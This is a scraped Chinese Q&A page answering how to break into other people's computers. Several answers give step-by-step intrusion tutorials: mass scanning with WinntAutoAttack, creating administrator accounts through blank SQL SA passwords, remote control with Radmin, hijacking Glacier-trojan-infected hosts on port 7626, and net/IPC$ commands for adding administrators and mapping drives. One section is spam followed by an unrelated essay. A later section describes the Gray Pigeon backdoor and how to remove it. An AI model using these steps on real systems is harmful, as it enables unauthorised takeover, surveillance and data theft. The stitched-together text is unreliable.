怎麼攻擊別人家電腦嗎

1. 如何攻擊別人的電腦

最簡單的方法.
進DOS里.ping -n 1 -r IP
按上面這個格式. ping代表攻擊的意思回
-n是次數
1 就是1次
-r 是什麼答我不記的.反正你寫上去就行了.
IP 就添上別人的IP

只用一台機子攻擊是不行,多幾十台攻擊，他的機子要是差.防護能力差,一下子就over了

2. 怎樣攻擊別人的電腦、或者是系統。

知道對方的IP，然後用攻擊軟體進行攻擊，具體的方法就不是一二天能學會的了，也不是一句話兩句話能說清楚的，就這樣一個單純的攻擊就可以寫一本書。

3. 如何攻擊別人的電腦

教你如何遠程攻擊別人的電腦（黑客教程）

1,傻瓜級入侵

之所以說這是傻瓜級,因為這個方法完全不用動腦子,並且保守的說,照這個方法,兩個小時內肯定至少能入侵3台電腦!3台絕對是保守的數目!

需要軟體:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(簡稱RA) 3389登陸器(xp自帶的有,要是xp,就不要下載了,就是"開始"-"所有程序"-"附件"-"通訊"-"遠程桌面連接"

不知道在哪下?用網路搜!我最不喜歡的就是當在群里我告訴別人用什麼軟體後,他還喋喋不休的問我"在哪下?把地址給我吧",太懶了吧,難道下載地址在我腦子里?我不也是要搜嗎?

好了,下邊我們開始入侵了,下邊就是過程:

第一步. 打開WinntAutoAttack,就是那個手雷的標志,在"起始ip"里和"目標ip"里填上一個ip段,並且盡量把范圍搞大點,比如在"起始ip"里填"218.88.1.1",在"目標ip"里填"218.88.255.255".ip段建議下一個顯ip的qq,參考你qq上好友的ip去填.中獎概率更大!勾上"僅對ping檢查成功的機器進行檢測","檢測3389埠"和"收集netbios信息"

在"IIS溢出"選項卡里勾上"開99埠shell",這個是用來開99埠telnet的,要是你不會用telnet,這個就不要勾了. 在"簡單管理員密碼"選項卡里勾上"列出所有密碼簡單的管理帳號"和"上傳並安裝遠程圖形控制軟體". 在"sql漏洞"選項卡里也一樣,就是把三個框都打上勾,就是"列出密碼為空的sa帳號""建立系統管理員帳號(shanlu)"和"上傳並安裝遠程圖形控制軟體".

好了,連上網(你不會連網都沒連吧?)根據你機器的性能,把線程調下,就是拖那個小滑塊,越往右線程越大,要是你的機器性能不好,太大的線程會死機的!我的機器性能不錯,我才用110左右的線程,並且有的時候我也會死機... ...(哭... ...)

ok!一切就緒!點"開始" . 接下來,接下來我們干什麼呢?在qq上聊天吧,等結果吧

第二步. 時間很快就過去了,過了半個小時了吧,我們看看有沒有什麼結果,點"信息",把上邊的"廢話框"內容往下拉

主機:218.88.55.55
3389,Windows 2000 Advance Server Terminal 埠開放。
SQL漏洞:
sa帳號密碼為空。
建立系統管理員帳號shanlu()成功

哈哈,有肉雞了,這個是3389的肉雞,我們用3389的登陸器登陸上去,填上他的ip,用戶名是shanlu,密碼是空,他的機器就展現在我們面前了!

要是有這樣的提示:

主機:218.88.55.55
3389,Windows 2000 Advance Server Terminal 埠開放。
簡單管理員密碼:
帳號:
TsInternetUser(1234567890)[Administrators]

就說明用戶名是TsInternetUser,密碼是1234567890,要是括弧里什麼都沒有,就說明密碼是空,也就是說括弧里的是密碼,前邊的是用戶名.注意,帳戶必須要是管理員的帳戶,否則登陸不上去!"[Administrators]"告訴我們這是個管理員帳戶.

要是有主機提示開了4899埠或提示"安裝遠程圖形控制軟體成功",我們就可以用Remote Administrator了!(Remote Administrator需要安裝,強烈建議安裝後把服務端卸載掉,方法:開始-運行,在"運行"框里填"winnt\system32\re_server.exe /uninstall",注意是"winnt"還是"windows"就看你的機器系統文件夾是什麼了)卸載成功了會彈個對話框出來,說"removed successfully"要是你不卸載，最少也要在安裝後給服務端裝個密碼，因為RA本來不是一個黑客工具，他是一個很方便的遠程幫助的工具，甚至比windows自帶的遠程幫助工具用著還要舒服，可是，它同時也很象一個木馬，有客戶端和服務端，所以你要不把服務端卸載或加密碼的話，很可能」螳螂捕蟬，黃鵲在後」你就成為別人攻擊的目標了．

打開ra的客戶端，也就是那個帶紅色"R"的圖標，（藍色的是服務端，不要點）提示要輸注冊碼，一般這個下載的同時在」readme」文件里都能找到，要是找不到，我給你們一個：08le-+
長吧哈哈，然後把那個勾勾上，那個勾的意思是下次不再出現這個窗口（都是亂碼，暈～～）

進入了RA的主界面，我們點」add new connection to the list"（建立新連接）在彈出來的窗口的兩個框上都填上剛才開了4899或安裝圖形控制軟體成功的機器的ip，點ok，看下邊多出來一個小電腦的圖標沒？雙擊進去，看見什麼了？是不是看見人家的屏幕了？人家在干什麼你都看的清清楚楚吧哈哈！

慢！！！你干什麼，別亂動他的屏幕！先看看你用的是什麼模式進去的！我來給大家介紹下上邊的13個按紐的作用，我就給大家介紹其中的7個常用的吧．

第2個按紐，剛才我們用過了，就是添加主機按紐

第3個按紐，刪除主機

第5個按紐（中間的第一個）：這個按紐最厲害！先點這個，再雙擊你下邊肉雞的圖標進去，你不但能看見肉雞的屏幕，還能完完全全控制他的機器！！，不信，你雙擊他桌面上的圖標試!！或者把他正在開的窗口關了！（我怎麼這么壞？）是不是就和用自己電腦一樣？哈！剛開始的時候你可能不習慣這種控制，慢慢的你就會習慣了．可是，用這個要小心啊，因為你控制他電腦的動作，只要你的肉雞前有人，他就會發現，聰明一點的，他就立即下線了，而現在的肉雞大部分都是浮動ip，好，你這個肉雞白找了，還沒玩過癮就沒有了．．．

第6個按紐：只能看見屏幕，但不能控制他的電腦，適合觀察他機器的動靜，比如猜猜看他機器前現在有沒有人啊

第7個按紐：另類的telnet功能，你用這個模式進去後，看見的就和cmd下差不多，你可以在這個下邊給你的這個肉雞加個密碼，這樣後來的入侵者就進不去了（當然高手還是能進去，不過他肯定要利用其他漏洞了），並且你還可以在下邊做你想做的一切！

第8個按紐，進入文件夾模式．上邊的是你機器的文件夾，下邊的當然是他的了，你可以在這里把你機器里的木馬傳到他機器上，當然你要是發現他機器上有什麼你想要的，也可以下下來，並且一切都在神不知鬼不覺當中（賊？？）具體的做法？一個字：拖！把你的文件用滑鼠左鍵按著拖到下邊他的文件夾上松開是上傳，反過來就是下載了）方便吧？

第9個按紐，可以遠程給他關機，重起什麼的，怎麼做不要我說了吧？RA 真的很好用，爽！

第3步：要是出現這樣：
主機:218.88.55.55
SQL漏洞:
sa帳號密碼為空。
建立系統管理員帳號(shanlu)成功。
這說明我們可以用SQL漏洞了，看見WinntAutoAttack的那個「SQLCMD執行」的選項卡沒有？點它。
在「主機」後邊輸入ip，其他的不動，點「連接」，出現了「連接到主機:218.88.55.55」這個時候你點下「執行」（默認的執行"dir c:\"），他的c盤文件是不是在你面前了？比如在下邊執行「net start telnet」就是把它的telnet打開，然後開個cmd窗口，用剛才的管理員帳號"shanlu"telnet上去吧！具體怎麼做，我在下個文章里講ipc$的時候再講。

其實，這個是完完全全駭客的做法，時間長了，你就會發現，這樣做一點意思也沒有，漸漸的你就失去了當初的那種成就感，畢竟，在這個過程中，當你把過程摸熟了，整個入侵過程你不用用一點腦筋，不過，剛開始這么干還是有好處的，它會增加你的信心，並且，有的時候你可能會遇到一些問題，這樣，你就可以慢慢的掌握一點入侵的知識了．

作者提示：希望大家耐心看下去，此日誌僅供參考，不可利用此教程實施違法犯罪行為，如有人利用此教程作於違法犯罪行為，與作者無關。

4. 怎麼攻擊別人電腦

呵呵，你可以抄報警，說是噪音騷擾。襲
攻擊別人的電腦：
1、繁瑣，因為你還得去查找對方的IP，並相應的放置木馬和打開對方的電腦埠。
2、違法，現在的網監和網警，能輕易的找到你，這是違法行為。如果沒有後果還好，如果窺視了比人的隱私或是導致別人的網銀賬號裡面的欠款被盜，你有不可推卸的責任。
3、別人被你攻擊了，別人會很輕易的找人來維修，重新做系統，以上的工作白費。
所以，理智點，希望能幫到你！

5. 如何入侵別人的電腦，

過對方計算機的網路新手們准備的，主要使用的就是著名的國產冰河2.2，所以，如果你已經使用過冰河2.2，就不必跟著我們往下走了。其他有興趣的網路新手們，Let's go
第一步木馬軟體網路
下載必備的工具軟體。1號軟體就是埠掃描工具「網路刺客II」，2號軟體就是著名的國產木馬冰河2.2的控制端.
下載完畢並解壓縮之後跟我進行第二步!
第二步
運行1號軟體，首先出現的是「網路刺客II注冊向導」，別理它，點擊「稍後(Q)」就進入了網路刺客II的主界面。
第三步
在網路刺客II的主界面里選「工具箱(U)」-》「主機查找器(H)」，就進入了「搜索網際網路主機」界面。
第四步
進入「搜索網際網路主機」界面後，「起始地址」欄填XXX.XXX.0.0其中XXX.XXX自己去選擇了，比如你可以選61.128或選61.200等等，「結束地址」欄填XXX.XXX.255.255其中XXX.XXX的選擇要和前面一樣。「埠」欄填7626，其他欄保持默認不動。
好了，以上設置就是要搜索從XXX.XXX.0.0到XXX.XXX.255.255這一段IP地址中有冰河木馬的計算機了，再檢查一下填對沒有?如果一切OK，請點擊「開始搜索」。
第五步
觀察「總進度」和「段進度」是否在走動。如果沒有走動，那一定是IP地址設置不對，請認真檢查。如果兩個進度都在走動，呵呵，你就成功一半了，至少你會使用網路刺客II掃描網上開放某一埠的計算機了。 下面你要作的就是靜靜的等待，學用軟體是需要耐心的。大約20-30分鍾後，最下面的記錄欄里就應該出現記錄了(一般情況下，應該有5、6條記錄)。每一條記錄代表找到的中了冰河木馬的一台計算機，前面是該計算機的IP地址，後面是7626(冰河木馬埠)。黑客
第六步點擊「停止搜索」，但不要退出程序，到第十二步時還要用。運行2號軟體冰河，進入冰河主界面。選「[F]」-》「添加主機[A]」進入添加主機窗口。 文件
第七步 在「添加主機」窗口，「顯示名稱」里填入第五步里搜索到的第一條IP地址，當IP地址填入「顯示名稱」里後，「主機地址」里就自動填入相同的IP了。「訪問口令」不填，「監聽埠」保持默認的7626。
好了，檢查一下IP有沒有填錯，如果OK，點擊「確定」，在冰河主界面的「文件管理器」里就出現了剛才填入的IP地址了。
第八步
這一步和下一步最重要，請認真看清楚!在冰河的主界面里，點擊「文件管理器」里的「我的電腦」，這時「文件管理器」右邊的框里就會出現你的硬碟分區。比如，如果你的硬碟分的是四個區，「文件管理器」右邊的框里就會從上往下依次出現C:、D:、E:、F:，如果你的硬碟分的是兩個區，就會出現C:、D:。自己
第九步
點擊「文件管理器」里剛才輸入的第一條IP地址，稍等片刻(網速慢的情況下約10-30秒)，在「文件管理器」右邊的框里就會出現對方計算機的硬碟分區了。看到了嗎?看到了?呵呵，祝賀你，你已經成功地進入對方的計算機了!!!!!
第十步 黑螞蟻
你發現沒有出現對方計算機的硬碟分區!!呵呵，別急，看看冰河主界面最下端的狀態欄里有什麼提示，如果是下面兩種情況，就放棄，返回第七步，填入搜索到的第二條IP地址: 黑螞蟻
1、狀態欄里出現「口令不對」、「口令錯誤」、「密碼不對」、「密碼錯誤」等之類的提示，表示該計算機的冰河木馬是加了密碼的，沒有辦法，只得放棄!
2、狀態欄里出現「正在解釋命令，可能是1.2以前版本」等之類的提示，也放棄，新手是搞不定的，如果以後你熟練了可以給對方升級，這是後話!!
第十一步
如果出現的是「主機沒有響應」、「無法與主機建立連接」之類的提示，
先別忙放棄，重復3-4遍第八步到第九步的操作，即點擊「我的電腦」-》點擊輸入的IP地址，如此反復3-4遍後，還是不行的話再放棄，返回第七步，填入搜索到的下一條IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步操作後都不能進入對方計算機，呵呵，那是你的運氣太差!別急，這樣的運氣是經常碰到的!再返回第五步，在「搜索網際網路主機」界面里點擊「開始搜索」，這時該程序又從你停止的IP地址接著往下搜索了!!呵呵，等吧!!搜索吧!!只要你有時間，你一定能成功!
第十三步 終於成功了!我見到對方計算機硬碟分區了!呵呵，怎麼樣?你成功了，我的任務就完成了。進入對方計算機後，所有的操作和自己計算機「文件管理器」里的操作一模一樣!就沒什麼黑不到過來的了 ``

6. 怎樣攻擊別人的計算機

dos命令之net，教你怎麼攻擊別人電腦。
通過掃描21埠或3389埠就可以入侵
一般黑客入侵所需要的幾個常用命令
1：NET
只要你擁有某IP的用戶名和密碼，那就用IPC$做連接吧！
這里我們假如你得到的用戶是hbx，密碼是123456。假設對方IP為127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必須登陸後才可以用.登陸的方法就在上面.
----------------------
下面我們講怎麼創建一個用戶，由於SA的許可權相當於系統的超級用戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活，guest是NT的默認用戶，而且無法刪除呢？不知道是否這樣，我的2000就是刪除不了它。
net user guest /active:yes
----------------------
這里是把一個用戶的密碼改掉，我們把guest的密碼改為lovechina，其他用戶也可以的。只要有許可權就行了呀！
net user guest lovechina
net命令果然強大啊！
——————————————————————————————————
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

7. 怎麼攻擊別人的電腦

我知道一個真.實的..這個不錯 最後試過了； 是真實的；值得.+. l3059===76ll7 樓 主，希 望 採納
我知道一個真.實的..這個不錯 最後試過了； 是真實的；值得.+. l3059===76ll7 樓 主，希 望 採納-

-
幾番痛定思痛後，我便強制性地勸自己一心一意地准備迎接高考了。可是，一看到無恥的「糊塗」老師，我就想殺了他喂狗。他一上課，我就反胃。那怕碰見他，我都壓抑得慌。就這樣，高考，我最終還是拜見了「名落孫山」。

承言，十八歲的雨季，曾經的我，掙扎過、努力過、失敗過、憂郁過、痛苦過、徘徊過、惆悵過、吶喊過、彷徨過、思量過、氣妥過、消極過、遲頓過、愚蠢過、幼稚過、糾結過、懦弱過、羞澀過、純潔過、天真過、爛漫過、暗戀過、幻想過、快樂過、激動過、興奮過、激動過、判逆過……

但，經年後，再回首，才懂得，生命的每一個季節，都有風雨，都有彩虹。活著的每一個驛站，都有風景，都有春色。

若，人生，是一幅流動的畫卷。那，十八歲的雨季，將是畫卷中最青澀最靚麗的春色。經年後，再回首，那人生畫面上的一切，都是異樣的風采。經年後，再回首，十八歲再怎麼苦，也是無可替代的美。經年後，再回首，十八歲那一切的一切，都是人生最幸福最美好最明媚最純真的回憶

8. 怎樣攻擊別人的電腦

現在很多安全軟來件都做得非常好自，攻擊可以，但不容易入侵，高手都難搞，何況我們一般網民？別想了，別到時把自己電腦弄中毒了，因為網上那些黑客軟體本身就是病毒來的，你想利用它們，但是它們已經被被人利用了，你你把它們下載到你的電腦上，你的電腦就成肉雞了。

9. 如何入侵別人的電腦

工具：灰鴿子

步驟詳細看下面：

灰鴿子.由葛軍製造於2003年..它的主要功能就是遠程的控制.遠程注冊表遠程桌面遠程CMD 他是利用IE的漏洞上線的. 你可以去申請個FTP空間.來配置. 一般鴿子不免殺的話什麼殺毒都查得到的..
有什麼問題就說吧,.!
灰鴿子是國內一款著名後門。比起前輩冰河、黑洞來，灰鴿子可以說是國內後門的集大成者。其豐富而強大的功能、靈活多變的操作、良好的隱藏性使其他後門都相形見絀。客戶端簡易便捷的操作使剛入門的初學者都能充當黑客。當使用在合法情況下時，灰鴿子是一款優秀的遠程式控制制軟體。但如果拿它做一些非法的事，灰鴿子就成了很強大的黑客工具。這就好比火葯，用在不同的場合，給人類帶來不同的影響。對灰鴿子完整的介紹也許只有灰鴿子作者本人能夠說清楚，在此我們只能進行簡要介紹。
灰鴿子客戶端和服務端都是採用Delphi編寫。黑客利用客戶端程序配置出服務端程序。可配置的信息主要包括上線類型（如等待連接還是主動連接）、主動連接時使用的公網IP（域名）、連接密碼、使用的埠、啟動項名稱、服務名稱，進程隱藏方式，使用的殼，代理，圖標等等。
服務端對客戶端連接方式有多種，使得處於各種網路環境的用戶都可能中毒，包括區域網用戶（通過代理上網）、公網用戶和ADSL撥號用戶等。
下面介紹服務端：
配置出來的服務端文件文件名為G_Server.exe（這是默認的，當然也可以改變）。然後黑客利用一切辦法誘騙用戶運行G_Server.exe程序。
G_Server.exe運行後將自己拷貝到Windows目錄下(98/xp下為系統盤的windows目錄，2k/NT下為系統盤的Winnt目錄)，然後再從體內釋放G_Server.dll和G_Server_Hook.dll到windows目錄下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三個文件相互配合組成了灰鴿子服務端， G_Server_Hook.dll負責隱藏灰鴿子。通過截獲進程的API調用隱藏灰鴿子的文件、服務的注冊表項，甚至是進程中的模塊名。截獲的函數主要是用來遍歷文件、遍歷注冊表項和遍歷進程模塊的一些函數。所以，有些時候用戶感覺種了毒，但仔細檢查卻又發現不了什麼異常。有些灰鴿子會多釋放出一個名為G_ServerKey.dll的文件用來記錄鍵盤操作。注意，G_Server.exe這個名稱並不固定，它是可以定製的，比如當定製服務端文件名為A.exe時，生成的文件就是A.exe、A.dll和A_Hook.dll。
Windows目錄下的G_Server.exe文件將自己注冊成服務（9X系統寫注冊表啟動項），每次開機都能自動運行，運行後啟動G_Server.dll和G_Server_Hook.dll並自動退出。G_Server.dll文件實現後門功能，與控制端客戶端進行通信；G_Server_Hook.dll則通過攔截API調用來隱藏病毒。因此，中毒後，我們看不到病毒文件，也看不到病毒注冊的服務項。隨著灰鴿子服務端文件的設置不同，G_Server_Hook.dll有時候附在Explorer.exe的進程空間中，有時候則是附在所有進程中。
灰鴿子的作者對於如何逃過殺毒軟體的查殺花了很大力氣。由於一些API函數被截獲，正常模式下難以遍歷到灰鴿子的文件和模塊，造成查殺上的困難。要卸載灰鴿子動態庫而且保證系統進程不崩潰也很麻煩，因此造成了近期灰鴿子在互聯網上泛濫的局面。

二、灰鴿子的手工檢測
由於灰鴿子攔截了API調用，在正常模式下服務端程序文件和它注冊的服務項均被隱藏，也就是說你即使設置了「顯示所有隱藏文件」也看不到它們。此外，灰鴿子服務端的文件名也是可以自定義的，這都給手工檢測帶來了一定的困難。
但是，通過仔細觀察我們發現，對於灰鴿子的檢測仍然是有規律可循的。從上面的運行原理分析可以看出，無論自定義的伺服器端文件名是什麼，一般都會在操作系統的安裝目錄下生成一個以「_hook.dll」結尾的文件。通過這一點，我們可以較為准確手工檢測出灰鴿子 服務端。
由於正常模式下灰鴿子會隱藏自身，因此檢測灰鴿子的操作一定要在安全模式下進行。進入安全模式的方法是：啟動計算機，在系統進入Windows啟動畫面前，按下F8鍵(或者在啟動計算機時按住Ctrl鍵不放)，在出現的啟動選項菜單中，選擇「Safe Mode」或「安全模式」。

1、由於灰鴿子的文件本身具有隱藏屬性，因此要設置Windows顯示所有文件。打開「我的電腦」，選擇菜單「工具」—》「文件夾選項」，點擊「查看」，取消「隱藏受保護的操作系統文件」前的對勾，並在「隱藏文件和文件夾」項中選擇「 顯示所有文件和文件夾」，然後點擊「確定」。

2、打開Windows的「搜索文件」，文件名稱輸入「_hook.dll」，搜索位置選擇Windows的安裝目錄（默認98/xp為C:\windows，2k/NT為C:\Winnt）。

3、經過搜索，我們在Windows目錄（不包含子目錄）下發現了一個名為Game_Hook.dll的文件。

4、根據灰鴿子原理分析我們知道，如果Game_Hook.DLL是灰鴿子的文件，則在操作系統安裝目錄下還會有Game.exe和Game.dll文件。打開Windows目錄，果然有這兩個文件，同時還有一個用於記錄鍵盤操作的GameKey.dll文件。

經過這幾步操作我們基本就可以確定這些文件是灰鴿子 服務端了，下面就可以進行手動清除。

三、灰鴿子的手工清除

經過上面的分析，清除灰鴿子就很容易了。清除灰鴿子仍然要在安全模式下操作，主要有兩步：
1、清除灰鴿子的服務；
2、刪除灰鴿子程序文件。

注意：為防止誤操作，清除前一定要做好備份。

（一）、清除灰鴿子的服務

注意清除灰鴿子的服務一定要在注冊表裡完成，對注冊表不熟悉的網友請找熟悉的人幫忙操作，清除灰鴿子的服務一定要先備份注冊表，或者到純DOS下將注冊表文件更名，然後在去注冊表刪除灰鴿子的服務。因為病毒會和EXE文件進行關聯

2000／XP系統：

1、打開注冊表編輯器（點擊「開始」－》「運行」，輸入「Regedit.exe」，確定。），打開 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注冊表項。

2、點擊菜單「編輯」－》「查找」，「查找目標」輸入「game.exe」，點擊確定，我們就可以找到灰鴿子的服務項（此例為Game_Server，每個人這個服務項名稱是不同的）。

3、刪除整個Game_Server項。

98／me系統：

在9X下，灰鴿子啟動項只有一個，因此清除更為簡單。運行注冊表編輯器，打開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run項，我們立即看到名為Game.exe的一項，將Game.exe項刪除即可。

（二）、刪除灰鴿子程序文件

刪除灰鴿子程序文件非常簡單，只需要在安全模式下刪除Windows目錄下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然後重新啟動計算機。至此，灰鴿子VIP 2005 服務端已經被清除干凈。

以上介紹的方法適用於我們看到的大部分灰鴿子木馬及其變種，然而仍有極少數變種採用此種方法無法檢測和清除。同時，隨著灰鴿子新版本的不斷推出，作者可能會加入一些新的隱藏方法、防刪除手段，手工檢測和清除它的難度也會越來越大。

四、防止中灰鴿子病毒需要注意的事項

1. 給系統安裝補丁程序。通過Windows Update安裝好系統補丁程序(關鍵更新、安全更新和Service pack)，其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒廣泛利用，是非常必要的補丁程序

2. 給系統管理員帳戶設置足夠復雜足夠強壯的密碼，最好能是10位以上，字母+數字+其它符號的組合；也可以禁用/刪除一些不使用的帳戶

3. 經常更新殺毒軟體（病毒庫），設置允許的可設置為每天定時自動更新。安裝並合理使用網路防火牆軟體，網路防火牆在防病毒過程中也可以起到至關重要的作用，能有效地阻擋自來網路的攻擊和病毒的入侵。部分盜版Windows用戶不能正常安裝補丁，這點也比較無奈，這部分用戶不妨通過使用網路防火牆來進行一定防護

4. 關閉一些不需要的服務，條件允許的可關閉沒有必要的共享，也包括C$、D$等管理共享。完全單機的用戶可直接關閉Server服務。

. 下載HijackThis掃描系統

四、灰鴿子的下載地址

http://www.skycn.com/soft/15753.html zww3008漢化版

http://www.merijn.org/files/hijackthis.zip 英文版

2. 從HijackThis日誌的 O23項可以發現灰鴿子自的服務項

如最近流行的:

O23 - Service: SYSTEM$ (SYSTEM$Server) - Unknown owner - C:\WINDOWS\setemy.bat

O23 - Service: Network Connections Manager (NetConMan) - Unknown owner - C:\WINDOWS\uinstall.exe

O23 - Service: winServer - Unknown owner - C:\WINDOWS\winserver.exe

O23 - Service: Gray_Pigeon_Server (GrayPigeonServer) - Unknown owner - C:\WINDOWS\G_Server.exe

用HijackThis選中上面的O23項,然後選擇"修復該項"或"Fix checked"

3. 用Killbox刪除灰鴿子對應的木馬文件 可以從這里下載Killbox

「灰鴿子」殺傷力是「熊貓燒香」10倍

與「熊貓燒香」病毒的「張揚」不同，「灰鴿子」更像一個隱形的賊，潛伏在用戶「家」中，監視用戶的一舉一動，甚至用戶與MSN、QQ好友聊天的每一句話都難逃「鴿」眼。專家稱，「熊貓燒香」還停留在對電腦自身的破壞，而「灰鴿子」已經發展到對「人」的控制，而被控者卻毫不知情。從某種意義上講，「灰鴿子」的危害超出「熊貓燒香」10倍。

「灰鴿子」如何控制電腦牟利

「黑客培訓班」教網民通過「灰鴿子」控制別人電腦，「學費」最高200元，最低需要50元，學時一周到一個月不等。

黑客通過程序控制他人電腦後，將「肉雞」倒賣給廣告商，「肉雞」的價格在1角到1元不等。資深販子一個月內可以販賣10萬個「肉雞」。

被控制電腦被隨意投放廣告，或者乾脆控制電腦點擊某網站廣告，一舉一動都能被監視。

http://yncnc.onlinedown.net/soft/37257.htm
直接把文件的路徑復制到 Killbox里刪除

通常都是下面這樣的文件 "服務名"具體通過HijackThis判斷

C:\windows\服務名.dll

C:\windows\服務名.exe

C:\windows\服務名.bat

C:\windows\服務名key.dll

C:\windows\服務名_hook.dll

C:\windows\服務名_hook2.dll

舉例說明:

C:\WINDOWS\setemykey.dll

C:\WINDOWS\setemy.dll

C:\WINDOWS\setemy.exe

C:\WINDOWS\setemy_hook.dll

C:\WINDOWS\setemy_hook2.dll

用Killbox刪除那些木馬文件,由於文件具有隱藏屬性,可能無法直接看到,但Killbox能直接刪除. 上面的文件不一定全部存在,如果Killbox提示文件不存在或已經刪除就沒關系了

以上他們做了命名規則解釋 去下載一個木馬殺客灰鴿子專殺 下載地址 http://down911.com/SoftView/SoftView_3014.html 瑞星版本的專殺 下載地址 http://down911.com/SoftView/SoftView_3668.html 清理完後 需要重新啟動計算機 服務停止 然後去找那些殘留文件 參見 上面回答者

軟體名稱： 灰鴿子（Huigezi、Gpigeon）專用檢測清除工具

界面語言： 簡體中文

軟體類型： 國產軟體

運行環境： /Win9X/Me/WinNT/2000/XP/2003

授權方式： 免費軟體

軟體大小： 414KB

軟體簡介： 由灰鴿子工作室開發的,針對灰鴿子專用清除器!可以清除VIP2005版灰鴿子服務端程序(包括殺毒軟體殺不到的灰鴿子服務端)和灰鴿子 [輻射正式版] 和 DLL版服務端 牽手版服務端

運行DelHgzvip2005Server.exe文件清除VIP2005版灰鴿子服務端程序，運行un_hgzserver.exe文件清除灰鴿子 [輻射正式版] 和 DLL版服務端 牽手版服務

五、灰鴿子的公告聲明

灰鴿子工作室於2003年初成立,定位於遠程式控制制、遠程管理、遠程監控軟體開發，主要產品為灰鴿子遠程式控制制系列軟體產品。灰鴿子工作室的軟體產品，均為商業化的遠程式控制制軟體，主要提供給網吧、企業及個人用戶進行電腦軟體管理使用；灰鴿子軟體已獲得國家頒布的計算機軟體著作權登記證書，受著作權法保護。

然而，我們痛心的看到，目前互聯網上出現了利用灰鴿子遠程管理軟體以及惡意破解和篡改灰鴿子遠程管理軟體為工具的不法行為，這些行為嚴重影響了灰鴿子遠程管理軟體的聲譽，同時也擾亂了網路秩序。這完全違背了灰鴿子工作室的宗旨和開發灰鴿子遠程管理軟體的初衷。在此我們呼籲、勸告那些利用遠程式控制制技術進行非法行為的不法分子應立即停止此類非法活動。

應該表明的是，灰鴿子工作室自成立以來恪守國家法律和有關網路管理的規定，具有高度的社會責任感。為有效制止不法分子非法利用灰鴿子遠程管理軟體從事危害社會的非法活動，在此，我們鄭重聲明，自即日起決定全面停止對灰鴿子遠程管理軟體的開發、更新和注冊，以實際行動和堅定的態度來抵制這種非法利用灰鴿子遠程管理軟體的不法行為，並誠懇接受廣大網民的監督。

灰鴿子工作室譴責那些非法利用遠程式控制制技術實現非法目的的行為，對於此類行為，灰鴿子工作室發布了灰鴿子服務端卸載程序，以便於廣大網民方便卸載那些被非法安裝於自己計算機的灰鴿子服務端。卸載程序下載頁面。

六、灰鴿子工作室
灰鴿子工作室於2003年 初成立,定位於遠程式控制制,遠程管理,遠程監控軟體開發,主要產品為灰鴿子遠程式控制制系列,2005年6月,正式推出使用驅動技術捕獲屏幕的遠程式控制制軟體,捕獲屏幕速度開始超越國外遠程式控制制軟體,灰鴿子開始被喻為遠程式控制制的代名詞。我們希望，用我們的技術和經驗，打造出最好的遠程式控制制軟體，推動遠程式控制制技術的發展！

2007年3月21日
http://www.huigezi.net/uninstall/
卸載頁面
七、灰鴿子官方網站
